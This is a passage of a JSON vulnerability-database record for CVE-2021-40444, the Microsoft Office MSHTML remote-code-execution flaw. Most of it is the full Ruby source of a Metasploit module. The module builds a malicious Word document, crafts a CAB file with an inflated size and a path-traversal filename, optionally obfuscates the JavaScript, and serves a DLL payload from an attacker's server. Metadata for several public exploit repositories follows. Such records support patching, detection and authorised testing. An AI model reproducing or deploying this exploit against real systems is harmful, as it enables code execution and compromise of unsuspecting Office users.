"CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-15T05:00:22", "id": "THN:67ECC712AB360F5A56F2434CDBF6B51F", "href": "https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T15:44:17", "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n", "cvss3": {}, "published": "2021-11-09T11:18:58", "type": "metasploit", "title": "Microsoft Office Word Malicious MSHTML RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-08T22:22:44", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_mshtml_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_mshtml_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 